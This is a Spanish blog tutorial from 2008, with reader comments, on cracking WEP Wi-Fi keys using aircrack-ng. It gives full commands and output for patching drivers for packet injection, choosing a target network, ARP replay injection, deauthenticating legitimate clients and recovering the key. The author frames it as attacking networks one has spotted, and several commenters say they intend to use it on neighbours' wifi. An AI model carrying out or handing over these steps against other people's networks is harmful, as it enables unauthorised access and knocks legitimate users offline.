La guía definitiva para romper claves WEP (con clientes conectados)

Abril 8th, 2008

Sí, tengo un poco abandonado el blog y no voy a justificarme… la vida es así. Pero bueno, por fin he encontrado un rato para escribir la guía que tantos me habéis pedido, una guía paso a paso sobre como romper claves WEP. He decidido dividir la guía en dos partes diferenciadas por su contenido. En ésta exploraremos como hacernos con las contraseñas de esas redes que tienen clientes wifi conectados y ya en la segunda, atacaremos las redes que aunque ofrecen cobertura wifi nadie se conecta (legítimamente) a ellas. Bien, comencemos sin más preámbulos:

Réquisitos Previos

* Tener Linux (por supuesto), o al menos cualquier distribución Live como por ejemplo Knoppix-STD.

* Descargar la última versión del aircrack-ng (es importante que descarges una versión superior a la 0.94).

Instalar el aircrack-ng

Si como te dije en requisitos previos has descargado el aircrack-ng desde la web, ahora toca instalarlo:

$ tar xzf aircrack-ng-1.0-beta2.tar.gz

$ cd aircrack-ng-1.0-beta2/

$ make

$ sudo make install

Si no me has hecho caso e instalaste el aircrack-ng desde tu gestor de paquetes (apt-get, yum, o el que sea) comprueba que la versión sea superior a la 0.94 y si no es así, bájalo desde la web e instálalo.

Parchear los drivers de la tarjeta de red

Los drivers originales de la tarjeta de red normalmente no permiten inyectar tráfico en una wifi, es decir, generar paquetes a medida e inyectarlos en la red para lograr nuestros objetivos. Por lo tanto, se hace necesario parchear los drivers de nuestra tarjeta de red. Para saber que tarjeta de red estás usando prueba con:

$ lspci | grep Network
0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)

En la págian oficial del aircrack-ng encontrarás un montón de parches para diferentes drivers. Elige el que corresponda a tu tarjeta y luego parchea tu kernel. No te asustes, no es complicado (si tu driver es exactamente el que aparece arriba, sáltate los siguientes pasos):

1. Busca las fuentes de tu kernel, normalmente deberían estar en /usr/src/linux (si no las tienes, descárgalas desde www.kernel.org).

2. Baja el parche a /usr/src

3. Aplica el parche con el comando patch:

# cd /usr/src/linux

# patch -p1 < /usr/src/nombre.parche

4. Compila e instala el nuevo kernel (déjame un comentario si tienes problemas para hacer esto).

PERO si tu tarjeta de red es igual que la mía Intel Corporation PRO/Wireless 3945ABG estás de suerte, porque te voy a explicar el procedimiento paso a paso ;)

Este driver no está entre los que podemos encontrar en la web del aircrack-ng, sin embargo existe una página alternativa en donde podemos descargárnoslo: http://homepages.tu-darmstadt.de/~p_larbig/wlan/

1. Nos descargamos la última versión

$ wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/ipwraw-ng-2.3.4-04022008.tar.bz2

2. Ahora necesitamos los fuentes del núcleo. Si hemos compilado nuestro propio kernel, ya tendremos los fuentes. Si estamos usando una versión precompilada del kernel, necesitamos las cabeceras. Si usas Debian o Ubuntu bájate las cabeceras de una forma similar a la siguiente:

# uname -a

Linux Darky 2.6.18-5-686 #1 SMP Tue Nov 20 13:39:58 WET 2007 i686 GNU/Linux

# apt-get install linux-headers-2.6.18-5-686

Si las cabeceras que estás intentando instalar ya no se encuentran en el repositorio de tu distribución, tendrás que actualizar tu kernel a una versión más reciente vía apt-get y luego instalar las cabeceras.

3. Instalamos el driver

# tar xjf ipwraw-ng-2.3.4-04022008.tar.bz2

# cd ipwraw-ng

# make

# make install

# make install_ucode

4. Descargamos el driver original y usamos el parcheado (ATENCIÓN: el nuevo driver no sirve para navegar normalmente, así que sólo lo cargaremos cuando vayamos a monitorizar/inyectar paquetes).

# rmmod ipw3945

# modprobe ipwraw

Fijar un objetivo

Supongo que si estás leyendo este tutorial es porque ya le has echado el ojo a alguna red, pero si no es así lo primero que tenemos que tener claro es que red vamos a atacar y obtener unos cuantos datos sobre ella. Hay muchas formas de hacer esto, pero ya que estamos usando aircrack-ng emplearemos la utilidad de monitoreo que trae este kit. Así pues, primero echamos un vistazo a las redes disponibles:

# airodump-ng eth2

—-

CH 10 ][ Elapsed: 12 s ][ 2008-04-08 11:23

BSSID PWR Beacons #D, #/s CH MB ENC CIPHER AUTH ESSID

00:14:51:74:5E:FF 0 20 69 0 6 54 WEP WEP air_wifi

BSSID STATION PWR Rate Lost Packets Probes

00:14:51:74:5E:FF 00:18:DE:10:99:3B 0 0- 0 0 5
00:14:51:74:5E:FF 00:12:F0:06:62:5A 0 0- 0 209 70

—-

Hemos detectado una red con dos clientes conectados. Ahora necesitamos obtener la máxima información de esa red (capturar todos los paquetes de datos entres los clientes y el punto de acceso), así que volvemos a relanzar el airodump-ng pero incluyendo opciones para que sólo capture paquetes de esa red. Además, debemos guardar todo lo capturado en un fichero, que nos será de gran utilidad más tarde.

# airodump-ng –bssid 00:14:51:74:5E:FF –channel 6 –write captura eth2

El BSSID y el CHANNEL lo obtenemos de la anterior ejecución del airodump.

Acelerar el proceso

Para poder romper una clave WEP necesitamos capturar un elevado número de paquetes útiles, para acelerar el proceso de captura de datos usaremos la combinaicón de dos técnicas: ARP Replay y DeAuth.

Con la primera técnica pondremos a nuestro equipo a escuchar y cada vez que capture un paquete ARP lo reenviará hasta la saciedad, con la segunda forzaremos a los clientes legítimos a desconectarse, lo que implica que tendrán que iniciar el proceso de conexión nuevamente y por lo tanto generarán una oleada de paquetes ARP que nuestro anterior ataque se encargará de utilizar provechosamente.

Ataque ARP Replay

Para llevar a cabo este ataque, lo primero es registrar nuestro equipo en la wifi (requiere que hayamos parcheado los drivers de nuestra tarjeta de red).

Así pues, necesitamos la MAC de nuestra tarjeta wifi:

# ifconfig eth2
eth2 Link encap:UNSPEC HWaddr 00-19-D2-6D-1E-01-F4-FF-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:2346 Metric:1
RX packets:15373 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1874966 (1.7 MiB) TX bytes:0 (0.0 b)
Interrupt:17 Base address:0xc000 Memory:efdff000-efdfffff

La MAC son los 6 primeros pares de dígitos que encontramos tras HWaddr, en mi caso sería: 00:19:D2:6D:1E:01

Con este dato y con los que tenemos del paso anterior ya podemos iniciar el ataque:

Primero, nos registramos:

# aireplay-ng -1 0 -e air_wifi -a 00:14:51:74:5E:FF -h 00:19:D2:6D:1E:01 eth2
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Luego dejamos funcionando el ataque ARP Replay:

# aireplay-ng -3 -b 00:14:51:74:5E:FF -h 00:19:D2:6D:1E:01 eth2

Y ahora lanzamos el ataque DeAuth para desconectar a los clientes legítimos:

# aireplay-ng -0 1 -a 00:14:51:74:5E:FF eth2

Si todo va bien, veremos como la ventana donde hemos puesto a funcionar el ataque “ARP Replay” comienza a llenarse con actividad de paquetes enviados. Y también veremos como la ventana del airodump-ng comienza a registrar una cantidad notable de tráfico y lo que es más importante, muchos paquetes con vectores IV útiles.

Después de capturar suficientes paquetes sólo nos queda poner a funcionar el aircrack-ng

# aircrack-ng captura.cap

Y a esperar a que obtenga la ansiada clave. Bueno, espero vuestros comentarios, sugerencias y correcciones. Ya escribiré la segunda parte un año de estos :P

Categorías: seguridad, tutoriales |

23 comentarios

  1. shanakadu

    Copiado y pegado, esta noche busco la manera de hacerlo, y hacerme con el poder de algun mandril de por aki. jejeje. Saludos.
    P.D.: Espero que la segunda parte sea este año y MÁS concretamente la semana del 08-04-2008 /13-04-2008

  2. meneame.net

    La guía definitiva para romper claves WEP (con clientes conectados)

    Un árticulo paso a paso, para obtener claves wep de wifi encriptadas y mediante este método poder averiguar si nuestra red wifi es mas segura.

  3. Uno

    Hola cuando he realizado todos los pasos, puesto q tenia la misma tarjeta wifi llego a la parte de fijar el objetivo pruebo a ejecutar el airodump pero no esta instalado en el kit de aircraft, si esta airodump-ng pero no esa asi q me gustaria saber donde se consigue este programa y como instalarlo,

    Gracias.

  4. SynWenn

    Ha sido una errata. El programa al que me refiero en el artículo es el airodump-ng. Voy a corregir el artículo.

    Gracias

  5. SendaOscura.com | Acatos

    [...] WEP de mi router wifi. Aunque solo sea por deporte, y lo haré, siguiendo el gran tutorial llamado La guía definitiva para romper claves WEP (con clientes conectados) que publican en SendaOscura.com pueden elegir creerme o no, pero mi router se acaba de poner a [...]

  6. Yoda

    No puedo instalar el parche tengo una ipw2100 he usado el de la 2200 y me dice File to patch: y no se que hacer

    Saludos

  7. SynWenn

    Hola Yoda,

    para poder aplicar un parche necesitas las fuentes. En tu caso, las fuentes de tu tarjeta de red vienen incluidas junto a las fuentes del núcleo. Así pues, bájate el paquete que las contiene (algo similar a linux-source-2.6.22 pero usando tu versión del núcleo).

    Luego aplica el parche tal y como se describe en este tutorial y recompila tu núcleo (hay muchos tutoriales sobre cómo recompilar el kernel).

  8. Paco

    como lo ago para mi antena q es una: Intel(R) WiFi Link 5100 AGN . y no se como se hace.gracias

  9. Joe

    holas! tengo problemas al instalar el aricrack con el comando make… despue de mucho texto, aparece Error 2

    q sera?

  10. ELVISBMX

    Hola tengo un rauter zizel 600 tambien tego la maisma tarjeta una portatil hp 500. yo le puese a mi rauter una copntraseña corta de 5 digitos (64dit).
    y decidi leer este tuto y eh trabajado con backtrack wislax todo en barias versiones y eh parchado bien el chip todo barbaro eh hecho como 7 pruebas y todo anda perfecto el detalle es que es demasiado lenta la captura de datos tarda una noche entera para descargar 500 osea me tocaria esperar 50 dias para obtener la calve? me gustaria que me dieras una orientacion calra soibre esto no se si este fallando eh leido numerosos ataques los eh probado eh cambiado de drivers trabajo en un negocio de lecetronica y me prestaron distintas antenas asi que necesito saber por que no logro capturar alguno que alla solucionado esto le agradezco Elvisbmx_2@hotmail.com

  11. Michael Jacksson x

    Hola lo k tienes k acer es buscar una red k salga no segura asi yo tengo cmo 9 redes conectadas a mi pc tengo internet ace cmo 1 año 1/2 ese es mi recado = creo en el aircrack pero a los k son de chile el VTR y TELEFONICA TE ROMPE LAS PAGINAS CONECTADO EN EL AIRCRACK asi k pfffffffffffffffffffff xao xorizos a los k son de chile de copiapo el palomar

  12. Istar Eldritch

    SIento molestar despues de más de un año del tuto, per leyéndolo me dí cuenta de que cuando descargas el módulo iwl3945 para cargar el ipwraw en el tuto escribes mal el nombre del módulo iwl3945 por ipw3945. Y eso, suele confundir.

  13. dj yeral

    mira man plis porfa quiero q me esplique con mas detalle mira mi tarjeta es una d-link una causa de mi barrio se anda tirando la pana q q sabe como mucho por q piensa q todo lo sabe y quisiera taparle la boca no se si me podrias enseñar muy bien aun q yo reo q sip pero ahyte dejo mi mensaje mi tarjeta inalambrica es una d-link 520 180mega

  14. thelematic

    necesito hacerlo con windows vista ya que eso es lo que yo uso
    diganme como lo tengo que hacer

  15. elkuko

    Hey! primero OLÉ! me gusta mucho esta página siempre he querido seguir la senda oscura, pero nunca se me ocurrió ponerla de dirección web directamente =P
    lo segundo; tengo un problema al cúal le estoy dedicando mucho tiempo y no encuentro solución, siempre que quiero conocer la contraseña de una red WEP deseo que haya alguien conectado… desde luego el tiempo que tarda son minutillos pero esto no siempre es asi. Ahora mi duda:
    Se puede con otro odernador al que tengas acceso generar trafico de alguna manera sin que este tenga acceso a a la red por el router en cuestión… quiero decir, seguro que hay una manera pero no se… el ataque -3 de aireplay es inyeccion de paquetes pero no genera tráfico?¿

    a ver si me podeis ayudar, muchas gracias!

  16. roost

    Hola, e intentado seguir estos pasos, pero cuando trato de instalar el driver ipwraw para mi tarjeta Intel Corporation PRO/Wireless 3945ABG al hacer make en la consola recibo el siguiente error: http://paste.ubuntu.com/438012/, por favor si alguien puede ayudarme a solucionarlo.

  17. fran

    oye k no me sirve esto
    no piuedoo acerloo

  18. Moisés

    Buenas,
    Soy de Las Palmas, amigo de un ex-compañero de trabajo tuyo, y me había recomendado tu web. Me he puesto a probar con romper las WEP y tengo un problema gordo.

    En el punto de descargar el driver original y usar el parcheado la he jodido, porque ahora no encuentro el driver original y el parcheado no puedo seguir avanzando porque me dice que airodump no está instalado correctamente, y no puede instalarlo bien porque no tiene conexión a internet… En fin, la cosa es:

    Tengo la misma tarjeta de red que tú, sólo necesito el ipw3945 para restablecer la conexión… Por lo que más quieras, me puedes dar unos sencillos pasos para descargar y restablecer el driver de mi tarjeta original y poder conectarme de nuevo en linux?
    Muchas gracias

  19. daniel diego

    Hola amigo tengo problemas en la parte
    # patch -p1 < /usr/src/nombre.parche
    cuando ingreso ese comando me aparece lo siguiente :
    /*********************************************************
    daniel@daniel-NV55C:/usr/src/linux-headers-2.6.35-28$ sudo patch -p1 < /usr/src/ath9k_regdomain_override.patch
    patching file drivers/net/wireless/ath/ath9k/main.c
    Hunk #1 FAILED at 28.
    Hunk #2 FAILED at 1588.
    2 out of 2 hunks FAILED — saving rejects to file drivers/net/wireless/ath/ath9k/main.c.rej
    *************************************************/
    Que sera? te agradeceria mucho tu ayuda, saludos!

  20. Andres

    error 2, haciendo el make
    WARNING: $SHELL not set to bash.
    If you experience build errors, try
    ‘make SHELL=/bin/bash’.

    make -C /lib/modules/2.6.35-22-generic/build M=/home/dell1420/ipwraw-ng modules
    make[1]: se ingresa al directorio `/usr/src/linux-headers-2.6.35-22-generic’

    WARNING: $SHELL not set to bash.
    If you experience build errors, try
    ‘make SHELL=/bin/bash’.

    CC [M] /home/dell1420/ipwraw-ng/ipwraw.o
    /home/dell1420/ipwraw-ng/ipwraw.c:43: fatal error: net/ieee80211.h: No existe el archivo o directorio
    compilation terminated.
    make[2]: *** [/home/dell1420/ipwraw-ng/ipwraw.o] Error 1
    make[1]: *** [_module_/home/dell1420/ipwraw-ng] Error 2
    make[1]: se sale del directorio `/usr/src/linux-headers-2.6.35-22-generic’
    make: *** [modules] Error 2

  21. bassime

    BUenas, una duda… tengo capturados cerca de 2500000 de IVs pero aircrack-ng no logra romperlo, como lo debo de hacer? he probado con todos los comandos pensbles pero no funciona nada
    Muchas gracias

  22. bassime

    el ultimo comando que use fue>
    aircrack-ng -y *.cap
    el metodo estadistico experimental y nada de nada solo obtengo:
    Failed. Next try with 2575000 IVs
    alguna idea??

  23. valdyr

    estas usando un posfix experimental el estandar es -b ya lo intentaste?
    ej.
    aircrack-ng -b “BSSID” *.cap

Deja un comentario